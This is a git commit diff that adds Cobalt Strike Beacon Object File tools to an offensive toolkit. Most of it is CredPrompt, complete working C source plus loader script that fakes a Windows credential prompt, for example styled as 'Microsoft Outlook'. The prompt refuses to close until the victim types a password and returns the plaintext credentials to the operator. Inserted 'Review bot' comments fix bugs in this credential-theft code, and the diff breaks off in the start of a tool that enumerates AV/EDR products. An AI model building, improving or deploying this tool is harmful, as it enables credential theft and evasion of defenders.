
New tools update

unknown il y a 2 ans
Parent
commit
11062bfa88

+ 25 - 0
KIT/CredPrompt/README.md

@@ -0,0 +1,25 @@
+# AddTaskScheduler
+Start Windows credential prompt in an attempt to capture user credentials. Entered credentials are returned as output. The prompt is persistent so the victim can't cancel/close the prompt or enter an empty password. Any user attempt to do so is shown in the output. Finally, a timer is set on the prompt to make sure the beacon will return at some point.\n\n" .
+	
+>For the duration of the prompt, the beacon is occupied so set a reasonable timer. 
+
+## Arguments
+* `title`: a custom window title.
+* `message`: a custom message set in the window.
+* `timer`: number in seconds after how long the prompt should auto close. Default is set to 60.
+
+
+## Usage
+* `credprompt <title> <message> <(optional) time out>`
+
+
+## Examples
+* `credprompt "Microsoft Outlook" "Connecting to user@example.com" 30`
+
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 
+

+ 69 - 0
KIT/CredPrompt/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

+ 6 - 0
KIT/CredPrompt/bofcompile.bat

@@ -0,0 +1,6 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc credprompt.c
+move /y credprompt.obj credprompt.o
+
+

+ 284 - 0
KIT/CredPrompt/credprompt.c

@@ -0,0 +1,284 @@
+#define SECURITY_WIN32
+
+#include <stdio.h>
+#include <windows.h>
+#include <wincred.h>
+#include <Lmcons.h>
+#include <security.h>
+#include "credprompt.h"
+#include "beacon.h"
+
+#pragma comment(lib, "Secur32.lib")
+#pragma comment(lib, "credui.lib")
+#pragma comment(lib, "ole32.lib")
+#pragma comment(lib, "user32.lib")
+
+typedef struct {
+    UINT timeout;
+    HANDLE hTimeoutEvent;
+} TIMEOUT_STRUCT;
+
+
+
+
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
+	HRESULT hr = S_FALSE;
+	va_list argList;
+	DWORD dwWritten = 0;
+
+	if (g_lpStream <= (LPSTREAM)1) {
+		hr = OLE32$CreateStreamOnHGlobal(NULL, TRUE, &g_lpStream);
+		if (FAILED(hr)) {
+			return hr;
+		}
+	}
+
+	if (g_lpwPrintBuffer <= (LPWSTR)1) { 
+		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
+		if (g_lpwPrintBuffer == NULL) {
+			hr = E_FAIL;
+			goto CleanUp;
+		}
+	}
+
+	va_start(argList, lpwFormat);
+	if (!MSVCRT$_vsnwprintf_s(g_lpwPrintBuffer, MAX_STRING, MAX_STRING -1, lpwFormat, argList)) {
+		hr = E_FAIL;
+		goto CleanUp;
+	}
+
+	if (g_lpStream != NULL) {
+		if (FAILED(hr = g_lpStream->lpVtbl->Write(g_lpStream, g_lpwPrintBuffer, (ULONG)MSVCRT$wcslen(g_lpwPrintBuffer) * sizeof(WCHAR), &dwWritten))) {
+			goto CleanUp;
+		}
+	}
+
+	hr = S_OK;
+
+CleanUp:
+
+	if (g_lpwPrintBuffer != NULL) {
+		MSVCRT$memset(g_lpwPrintBuffer, 0, MAX_STRING * sizeof(WCHAR)); 
+	}
+
+	va_end(argList);
+	return hr;
+}
+
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+VOID BeaconOutputStreamW() {
+	STATSTG ssStreamData = { 0 };
+	SIZE_T cbSize = 0;
+	ULONG cbRead = 0;
+	LARGE_INTEGER pos;
+	LPWSTR lpwOutput = NULL;
+
+	if (FAILED(g_lpStream->lpVtbl->Stat(g_lpStream, &ssStreamData, STATFLAG_NONAME))) {
+		return;
+	}
+
+	cbSize = ssStreamData.cbSize.LowPart;
+	lpwOutput = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, cbSize + 1);
+	if (lpwOutput != NULL) {
+		pos.QuadPart = 0;
+		if (FAILED(g_lpStream->lpVtbl->Seek(g_lpStream, pos, STREAM_SEEK_SET, NULL))) {
+			goto CleanUp;
+		}
+
+		if (FAILED(g_lpStream->lpVtbl->Read(g_lpStream, lpwOutput, (ULONG)cbSize, &cbRead))) {		
+			goto CleanUp;
+		}
+
+		BeaconPrintf(CALLBACK_OUTPUT, "%ls", lpwOutput);
+	}
+
+CleanUp:
+	if (g_lpStream != NULL) {
+		g_lpStream->lpVtbl->Release(g_lpStream);
+		g_lpStream = NULL;
+	}
+
+	if (g_lpwPrintBuffer != NULL) {
+		MSVCRT$free(g_lpwPrintBuffer); 
+		g_lpwPrintBuffer = NULL;
+	}
+
+	if (lpwOutput != NULL) {
+		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpwOutput);
+	}
+	return;
+}
+
+
+BOOL is_empty_or_whitespace(WCHAR *str) {
+    if (str == NULL) {
+        return TRUE;
+    }
+
+    while (*str) {
+        if (!MSVCRT$iswspace(*str)) {
+            return FALSE;
+        }
+        str++;
+    }
+    return TRUE;
+}
+
+
+BOOL CALLBACK EnumWindowsProc(HWND hWnd, LPARAM lParam) {
+    WCHAR className[256] = {0};
+    USER32$GetClassNameW(hWnd, className, sizeof(className) / sizeof(WCHAR));
+
+    if (MSVCRT$wcscmp(className, L"Credential Dialog Xaml Host") == 0) {
+        USER32$PostMessageW(hWnd, WM_CLOSE, 0, 0);
+        return FALSE;
+    }
+
+    return TRUE;
+}
+
+
+DWORD WINAPI PromptWithTimeout(LPVOID lParam) {
+    TIMEOUT_STRUCT *pTimeoutStruct = (TIMEOUT_STRUCT *)lParam;
+    UINT timeout = pTimeoutStruct->timeout;
+    HANDLE hTimeoutEvent = pTimeoutStruct->hTimeoutEvent;
+
+    KERNEL32$Sleep(timeout * 1000);
+    USER32$EnumWindows(EnumWindowsProc, 0);
+    KERNEL32$SetEvent(hTimeoutEvent);
+
+    return 0;
+}
+
+
+BOOL PromptForCreds(LPWSTR title, LPWSTR message, LPWSTR *username, LPWSTR *password, LPWSTR *domain, UINT timeout)
+{
+    PVOID packed_credentials = NULL;
+    ULONG packed_credentials_size = 0;
+	
+	HANDLE hTimeoutEvent = KERNEL32$CreateEventW(NULL, TRUE, FALSE, NULL);
+
+    // Get current username in DOMAIN\USERNAME format
+    WCHAR domainUsername[DNLEN + UNLEN + 2];
+    ULONG nSize = sizeof(domainUsername) / sizeof(WCHAR);
+    if (SECUR32$GetUserNameExW(NameSamCompatible, domainUsername, &nSize)) {
+        // Pack current username
+        WCHAR prefilled_username[DNLEN + UNLEN + 2];
+        MSVCRT$_snwprintf(prefilled_username, (sizeof(prefilled_username) / sizeof(WCHAR)) - 1, L"%s", domainUsername);
+
+        CREDUI$CredPackAuthenticationBufferW(0, prefilled_username, L"", NULL, &packed_credentials_size);
+        packed_credentials = MSVCRT$malloc(packed_credentials_size);
+        CREDUI$CredPackAuthenticationBufferW(0, prefilled_username, L"", (PBYTE)packed_credentials, &packed_credentials_size);
+    }
+	
+    BOOL bValidPassword = FALSE;
+    DWORD result;
+	
+	TIMEOUT_STRUCT timeoutStruct;
+	timeoutStruct.timeout = timeout;
+	timeoutStruct.hTimeoutEvent = hTimeoutEvent;
+
+	DWORD threadId;
+	HANDLE hThread = KERNEL32$CreateThread(NULL, 0, PromptWithTimeout, (LPVOID)&timeoutStruct, 0, &threadId);
+	
+	BeaconPrintToStreamW(L"\nPrompt event log:\n");
+	BeaconPrintToStreamW(L"==============================================\n");
+	
+    do {
+        // Prompt for credentials
+        CREDUI_INFOW credui_info = {0};
+        credui_info.cbSize = sizeof(credui_info);
+        credui_info.pszCaptionText = title;
+        credui_info.pszMessageText = message;
+		credui_info.hwndParent = NULL;
+		
+		HWND hWnd = USER32$GetForegroundWindow();
+		if (hWnd != NULL) {
+			credui_info.hwndParent = hWnd;
+		}
+
+        DWORD auth_package = 0;
+        BOOL save_credentials = FALSE;
+        ULONG out_credentials_size = 0;
+        LPVOID out_credentials = NULL;
+
+        result = CREDUI$CredUIPromptForWindowsCredentialsW(&credui_info, 0, &auth_package, packed_credentials, packed_credentials_size, &out_credentials, &out_credentials_size, &save_credentials, CREDUIWIN_GENERIC | CREDUIWIN_CHECKBOX);
+
+        if (result == NO_ERROR)
+        {
+            *username = (LPWSTR)MSVCRT$malloc(CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
+            *password = (LPWSTR)MSVCRT$malloc(CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
+            *domain = (LPWSTR)MSVCRT$malloc(CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
+
+            ULONG max_username = CREDUI_MAX_USERNAME_LENGTH;
+            ULONG max_password = CREDUI_MAX_USERNAME_LENGTH;
+            ULONG max_domain = CREDUI_MAX_USERNAME_LENGTH;
+            CREDUI$CredUnPackAuthenticationBufferW(0, out_credentials, out_credentials_size, *username, &max_username, *domain, &max_domain, *password, &max_password);
+	
+            bValidPassword = !is_empty_or_whitespace(*password);
+            if (!bValidPassword) {
+                BeaconPrintToStreamW(L"[!] User tried to enter empty password\n");
+            }
+            MSVCRT$memset(out_credentials, 0, out_credentials_size);
+            OLE32$CoTaskMemFree(out_credentials);
+		}
+		
+		else {
+			if (KERNEL32$WaitForSingleObject(hTimeoutEvent, 0) == WAIT_OBJECT_0) {
+				BeaconPrintToStreamW(L"[!] Credential prompt timed out\n");
+				break;
+				
+			} else {
+				BeaconPrintToStreamW(L"[!] User tried to close the prompt\n");
+			}
+		}
+	} while (!bValidPassword);
+	
+	KERNEL32$TerminateThread(hThread, 0);
+	KERNEL32$CloseHandle(hThread);
+	
+	if (packed_credentials)
+	{
+	MSVCRT$memset(packed_credentials, 0, packed_credentials_size);
+		MSVCRT$free(packed_credentials);
+	}
+
+	return bValidPassword;
+}
+
+
+int go(char *args, int len) {
+	LPWSTR title = L"";
+	LPWSTR message = L"";
+    LPWSTR username = NULL;
+    LPWSTR password = NULL;
+	LPWSTR domain = NULL;
+    UINT timer_seconds = 60;
+	datap parser;
+	
+	BeaconDataParse(&parser, args, len);
+	title = BeaconDataExtract(&parser, NULL);
+	message = BeaconDataExtract(&parser, NULL);
+	timer_seconds = BeaconDataInt(&parser, NULL);
+	
+	
+    if (PromptForCreds(title, message, &username, &password, &domain, timer_seconds))
+	{
+        BeaconPrintToStreamW(L"[+] User entered something:\n\tUsername: %ls\n\tPassword: %ls\n", username, password);
+		BeaconOutputStreamW();
+		
+		MSVCRT$memset(password, 0, MSVCRT$wcslen(password) * sizeof(WCHAR));
+        MSVCRT$free(username);
+        MSVCRT$free(password);
+        MSVCRT$free(domain);
+    }
+    else
+    {
+		BeaconOutputStreamW();
+        BeaconPrintf(CALLBACK_ERROR, "No credentials were obtained.\n");
+    }
+
+    return 0;
+}
+
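Review bot: The `if (result == NO_ERROR)` branch of PromptForCreds malloc()s username/password/domain on every iteration and never checks the return of CredUnPackAuthenticationBufferW, so an empty-password retry leaks the previous three buffers (leaving the earlier password un-scrubbed on the heap), a failed unpack leaves is_empty_or_whitespace() and the later wcslen() in go() reading uninitialized memory, and a timeout after such a retry returns with the buffers still allocated, which go() only frees on the success path. The rewrite below releases the previous attempt before reallocating, uses the already-declared MSVCRT$calloc so the strings are always terminated, checks the unpack result, and scrubs on the timeout exit. Separately, `timer_seconds = BeaconDataInt(&parser, NULL);` in go() passes a second argument that the beacon.h prototype does not declare (cl appears to report this only as a warning, which /W0 hides) and unconditionally overwrites the 60-second default the README calls optional, since credprompt.cna also forwards `$4` unchanged; `timer_seconds = BeaconDataInt(&parser); if (timer_seconds == 0) timer_seconds = 60;` would restore the documented behaviour. The event from CreateEventW is never closed, and the CreateEventW/CreateThread/malloc results are not checked before use.
```c
        if (result == NO_ERROR)
        {
            // An empty-password retry lands here again: scrub and release the
            // previous attempt's buffers instead of leaking them until go() returns.
            if (*password != NULL) {
                MSVCRT$memset(*password, 0, CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
            }
            MSVCRT$free(*username);
            MSVCRT$free(*password);
            MSVCRT$free(*domain);

            // calloc keeps the strings terminated even if unpacking fails below.
            *username = (LPWSTR)MSVCRT$calloc(CREDUI_MAX_USERNAME_LENGTH, sizeof(WCHAR));
            *password = (LPWSTR)MSVCRT$calloc(CREDUI_MAX_USERNAME_LENGTH, sizeof(WCHAR));
            *domain   = (LPWSTR)MSVCRT$calloc(CREDUI_MAX_USERNAME_LENGTH, sizeof(WCHAR));

            ULONG max_username = CREDUI_MAX_USERNAME_LENGTH;
            ULONG max_password = CREDUI_MAX_USERNAME_LENGTH;
            ULONG max_domain = CREDUI_MAX_USERNAME_LENGTH;
            bValidPassword = FALSE;
            if (*username == NULL || *password == NULL || *domain == NULL) {
                BeaconPrintToStreamW(L"[!] Out of memory while unpacking credentials\n");
            } else if (!CREDUI$CredUnPackAuthenticationBufferW(0, out_credentials, out_credentials_size, *username, &max_username, *domain, &max_domain, *password, &max_password)) {
                BeaconPrintToStreamW(L"[!] CredUnPackAuthenticationBufferW failed\n");
            } else {
                bValidPassword = !is_empty_or_whitespace(*password);
                if (!bValidPassword) {
                    BeaconPrintToStreamW(L"[!] User tried to enter empty password\n");
                }
            }
            // … unchanged: zero and CoTaskMemFree out_credentials …
        }
        // … unchanged: else branch (timeout / close handling) …
    } while (!bValidPassword);

    // Timed out after an empty-password attempt: go() only frees on success,
    // so scrub and release here and hand back NULLs.
    if (!bValidPassword) {
        if (*password != NULL) {
            MSVCRT$memset(*password, 0, CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
        }
        MSVCRT$free(*username); *username = NULL;
        MSVCRT$free(*password); *password = NULL;
        MSVCRT$free(*domain);   *domain = NULL;
    }
    // … unchanged: TerminateThread / CloseHandle / packed_credentials cleanup …
```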

+ 36 - 0
KIT/CredPrompt/credprompt.cna

@@ -0,0 +1,36 @@
+# author REDMED-X
+
+beacon_command_register(
+	"credprompt", "Start custom Windows credential prompt.",
+	"INFO:\nStart Windows credential prompt in an attempt to capture user credentials. Entered credentials are returned as output. The prompt is persistent so the victim can't cancel/close the prompt or enter an empty password. Any user attempt to do so is shown in the output. Finally, a timer for the prompt is set to make sure the beacon will return at some point.\n\n" .
+	"ARGUMENTS:\n[<title>]: a custom window title.\n[<message>]: a custom message set in the window.\n[<timer>]: number in seconds after how long the prompt should auto close. Default is set to 60.\n\n" .
+	"USAGE:\ncredprompt <title> <message> <(optional) timer>\n\n" .
+	"EXAMPLES:\ncredprompt \"Microsoft Outlook\" \"Connecting to user@example.com\" 60\n\n");
+	
+alias credprompt {
+    $bid = $1;
+	$title = $2;
+    $message = $3;
+	$timer = $4;
+	
+	if ($title eq "") {
+		berror($bid, "Please give the window a custom title.\n");
+		return;
+	}
+
+	if ($message eq "") {
+		berror($bid, "Please give the window a custom message.\n");
+		return;
+	}
+	
+    # Read in the right BOF file
+    $handle = openf(script_resource("credprompt.o"));
+    $data = readb($handle, -1);
+    closef($handle);
+
+	# Pack our arguments
+    $arg_data = bof_pack($bid, "ZZi", $title, $message, $timer);
+
+	blog($bid, "Tasked to start a credential prompt..");
+    beacon_inline_execute($bid, $data, "go", $arg_data);
+}

+ 52 - 0
KIT/CredPrompt/credprompt.h

@@ -0,0 +1,52 @@
+#include <windows.h>  
+
+//is_empty_or_whitespace
+DECLSPEC_IMPORT int __cdecl MSVCRT$iswspace(wint_t _C);
+
+//EnumWindowsProc
+DECLSPEC_IMPORT int __cdecl MSVCRT$wcscmp(const wchar_t* _Str1, const wchar_t* _Str2);
+DECLSPEC_IMPORT int WINAPI USER32$GetClassNameW(HWND hWnd, LPWSTR lpClassName, int nMaxCount);
+DECLSPEC_IMPORT BOOL WINAPI USER32$PostMessageW(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
+
+//PromptWithTimeout
+DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep (DWORD dwMilliseconds);
+DECLSPEC_IMPORT BOOL WINAPI USER32$EnumWindows(WNDENUMPROC lpEnumFunc, LPARAM lParam);
+
+//PromptForCreds
+DECLSPEC_IMPORT int __cdecl MSVCRT$_snwprintf(wchar_t* _Dst, size_t _MaxCount, const wchar_t* _Format, ...);
+DECLSPEC_IMPORT BOOL WINAPI SECUR32$GetUserNameExW(EXTENDED_NAME_FORMAT NameFormat, LPWSTR lpNameBuffer, PULONG nSize);
+DECLSPEC_IMPORT DWORD WINAPI CREDUI$CredUIPromptForWindowsCredentialsW(PCREDUI_INFOW pUiInfo, DWORD dwAuthError, ULONG *pulAuthPackage, LPCVOID pvInAuthBuffer, ULONG ulInAuthBufferSize, LPVOID *ppvOutAuthBuffer, ULONG *pulOutAuthBufferSize, BOOL *pfSave, DWORD dwFlags);
+DECLSPEC_IMPORT BOOL WINAPI CREDUI$CredUnPackAuthenticationBufferW(DWORD dwFlags, PVOID pAuthBuffer, DWORD cbAuthBuffer, LPWSTR pszUserName, DWORD *pcchMaxUserName, LPWSTR pszDomainName, DWORD *pcchMaxDomainName, LPWSTR pszPassword, DWORD *pcchMaxPassword);
+DECLSPEC_IMPORT BOOL WINAPI CREDUI$CredPackAuthenticationBufferW(DWORD dwFlags, LPWSTR pszUserName, LPWSTR pszPassword, PBYTE pPackedCredentials, DWORD *pcbPackedCredentials);
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetEvent(HANDLE hEvent);
+DECLSPEC_IMPORT DWORD WINAPI KERNEL32$WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds);
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateEventW(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCWSTR lpName);
+//DECLSPEC_IMPORT void* __cdecl MSVCRT$memset(void* _Dst, int _Val, size_t _Size);
+DECLSPEC_IMPORT void WINAPI OLE32$CoTaskMemFree(LPVOID pv);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$TerminateThread(HANDLE hThread, DWORD dwExitCode);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);
+DECLSPEC_IMPORT void __cdecl MSVCRT$free(void* _Block);
+DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(const wchar_t* _Str);
+DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t _Size);
+DECLSPEC_IMPORT HWND USER32$GetForegroundWindow();
+
+//BeaconPrintToStreamW + BeaconOutputStreamW
+#define MAX_STRING 8192
+INT g_iGarbage = 1;
+LPSTREAM g_lpStream = (LPSTREAM)1;
+LPWSTR g_lpwPrintBuffer = (LPWSTR)1;
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CreateStreamOnHGlobal(HGLOBAL hGlobal, BOOL fDeleteOnRelease, LPSTREAM *ppstm);
+WINBASEAPI void *__cdecl MSVCRT$calloc(size_t number, size_t size);
+WINBASEAPI int __cdecl MSVCRT$_vsnwprintf_s(wchar_t *buffer, size_t sizeOfBuffer, size_t count, const wchar_t *format, va_list argptr);
+WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str);
+WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
+WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
+WINBASEAPI LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
+WINBASEAPI void __cdecl MSVCRT$free(void *memblock);
+WINBASEAPI BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
+DECLSPEC_IMPORT int WINAPI KERNEL32$MultiByteToWideChar(UINT CodePage, DWORD dwFlags, _In_NLS_string_(cbMultiByte)LPCCH lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar);
+
+
+
+
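Review bot: credprompt.h has no include guard yet defines objects (`g_iGarbage`, `g_lpStream`, `g_lpwPrintBuffer`), so a second inclusion in any translation unit would be a redefinition error; wrapping the file in `#ifndef CREDPROMPT_H` / `#define CREDPROMPT_H` / `#endif` makes it safe, and the doubled declarations of `MSVCRT$free`, `MSVCRT$wcslen` and `MSVCRT$memset` could collapse to one each. `USER32$GetForegroundWindow()` is the only Win32 import declared without `WINAPI`; that is harmless for the x64 build the README targets, but `DECLSPEC_IMPORT HWND WINAPI USER32$GetForegroundWindow(void);` keeps the calling convention correct if the BOF is ever built for x86. `KERNEL32$MultiByteToWideChar` is declared but not referenced by credprompt.c and could be dropped.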

BIN
KIT/CredPrompt/credprompt.o


+ 15 - 0
KIT/EnumSecProducts/README.md

@@ -0,0 +1,15 @@
+# EnumSecProducts
+Get a list of security products (like AV/EDR) that are running on the system. This is done by comparing running processes against a hardcoded list of 130 security products.
+
+
+## Usage
+* `enumsecproducts`
+
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 
+
+

+ 69 - 0
KIT/EnumSecProducts/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

+ 6 - 0
KIT/EnumSecProducts/bofcompile.bat

@@ -0,0 +1,6 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc enumsecproducts.c
+move /y enumsecproducts.obj enumsecproducts.o
+
+

+ 692 - 0
KIT/EnumSecProducts/enumsecproducts.c

@@ -0,0 +1,692 @@
+#include <stdio.h>
+#include <stdbool.h>
+#include <string.h>
+#include <ctype.h>
+#include <windows.h>
+#include <tlhelp32.h>
+#include "enumsecproducts.h"
+#include "beacon.h"
+
+
+typedef struct {
+    const char *filename;
+    const char *description;
+    const char *category;
+} SoftwareData;
+
+
+
+//https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
+HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
+	HRESULT hr = S_FALSE;
+	va_list argList;
+	DWORD dwWritten = 0;
+
+	if (g_lpStream <= (LPSTREAM)1) {
+		hr = OLE32$CreateStreamOnHGlobal(NULL, TRUE, &g_lpStream);
+		if (FAILED(hr)) {
+			return hr;
+		}
+	}
+
+	if (g_lpwPrintBuffer <= (LPWSTR)1) { 
+		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
+		if (g_lpwPrintBuffer == NULL) {
+			hr = E_FAIL;
+			goto CleanUp;
+		}
+	}
+
+	va_start(argList, lpwFormat);
+	if (!MSVCRT$_vsnwprintf_s(g_lpwPrintBuffer, MAX_STRING, MAX_STRING -1, lpwFormat, argList)) {
+		hr = E_FAIL;
+		goto CleanUp;
+	}
+
+	if (g_lpStream != NULL) {
+		if (FAILED(hr = g_lpStream->lpVtbl->Write(g_lpStream, g_lpwPrintBuffer, (ULONG)MSVCRT$wcslen(g_lpwPrintBuffer) * sizeof(WCHAR), &dwWritten))) {
+			goto CleanUp;
+		}
+	}
+
+	hr = S_OK;
+
+CleanUp:
+
+	if (g_lpwPrintBuffer != NULL) {
+		MSVCRT$memset(g_lpwPrintBuffer, 0, MAX_STRING * sizeof(WCHAR)); 
